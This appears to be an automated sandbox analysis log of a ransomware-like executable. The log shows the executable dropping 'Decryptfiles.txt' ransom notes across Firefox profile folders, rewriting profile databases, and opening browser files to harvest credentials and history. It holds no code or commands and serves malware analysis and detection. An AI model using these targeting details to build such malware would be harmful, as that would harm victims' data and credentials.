Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\notepad.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt VolumeInformation

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Overwrites Mozilla Firefox settings

Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\addonStartup.json.lz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\bookmarkbackups\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\AlternateServices.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\compatibility.ini
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\containers.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\content-prefs.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\crashes\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-wal.tyKf
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\crashes\events\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496526932.a88cd073-7a8b-423f-bd0e-4c9cfe05f0fa.event.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496526932.a88cd073-7a8b-423f-bd0e-4c9cfe05f0fa.event.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496526938.6f88a504-672b-429f-becc-5f24bfcb1009.main.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496526938.6f88a504-672b-429f-becc-5f24bfcb1009.main.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496526939.711b9395-807b-4c7f-a045-dd83b14de7aa.first-shutdown.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496526939.711b9395-807b-4c7f-a045-dd83b14de7aa.first-shutdown.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496532955.5c52a77f-c922-4d05-b4a5-35092432cb64.health.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496532976.270e063c-5835-4e21-b776-167913525107.event.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496532976.270e063c-5835-4e21-b776-167913525107.event.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496532976.f626f4c3-4652-4b17-a31d-20b62aabb4bc.health.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496532994.855442d8-08ff-437c-ab54-8b85f7a1de31.main.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496532994.855442d8-08ff-437c-ab54-8b85f7a1de31.main.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\db\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\events\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\db\data.safe.bin
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\db\data.safe.bin
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\events\background-update
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\pending_pings\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\events\events
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\pending_pings\cb77fc44-213e-46f2-a233-e27b26b3b3e2
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\tmp\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\session-state.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\state.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\pending_pings\f30d6b3f-1d43-4dd4-add9-f29c1313c2dd
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\ExperimentStoreData.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\extension-preferences.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite-wal.NEgp
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\handlers.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\minidumps\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\parent.lock.hMVA
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\permissions.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\permissions.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-wal.Fniq
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\saved-telemetry-pings\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\protections.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\protections.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\saved-telemetry-pings\5c52a77f-c922-4d05-b4a5-35092432cb64
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\saved-telemetry-pings\6f88a504-672b-429f-becc-5f24bfcb1009
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\saved-telemetry-pings\6f88a504-672b-429f-becc-5f24bfcb1009
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\security_state\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\search.json.mozlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\sessionCheckpoints.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\sessionstore-backups\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\sessionstore-backups\previous.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\sessionstore.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\shield-preference-experiments.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\SiteSecurityServiceState.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\default\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\.metadata-v2
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal.gpUZ
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal.gMnV
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal.Frcy
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal.ZAPo
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal.gJTK
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal.hMBY
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\temporary\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\to-be-removed\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\targeting.snapshot.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\targeting.snapshot.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\webappsstore.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ca4gppea.default\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\xulstore.json.DUlr
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\webappsstore.sqlite-wal.JIwl
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\webappsstore.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\webappsstore.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\ExperimentStoreData.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\saved-telemetry-pings\5c52a77f-c922-4d05-b4a5-35092432cb64
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496532976.270e063c-5835-4e21-b776-167913525107.event.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
